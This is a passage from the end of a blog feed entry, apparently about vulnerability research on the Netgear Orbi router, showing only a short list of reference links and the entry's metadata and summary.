  <li><a href="https://github.com/insanid/netgear-telenetenable">netgear-telnetenable Python script</a></li>
  <li><a href="https://fccid.io/PY317400402">Orbi RBR20 FCCID.io page</a></li>
  <li><a href="https://kb.netgear.com/2649/NETGEAR-Open-Source-Code-for-Programmers-GPL">Netgear GPL Downloads page</a></li>
  <li><a href="https://hackaday.com/2019/07/02/hands-on-greatfet-is-an-embedded-tool-that-does-it-all/">GreatFET One</a></li>
</ul>]]></content><author><name>hyper</name></author><category term="research" /><category term="bug-hunting" /><category term="vulnerability-research" /><category term="orbi" /><category term="netgear" /><category term="iot" /><summary type="html"><![CDATA[a data dump of findings and notes taken while hunting for vulnerabilities on the Netgear Orbi.]]></summary><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blog.coffinsec.com/assets/images/orbi-connect.png" /><media:content medium="image" url="https://blog.coffinsec.com/assets/images/orbi-connect.png" xmlns:media="http://search.yahoo.com/mrss/" /></entry></feed>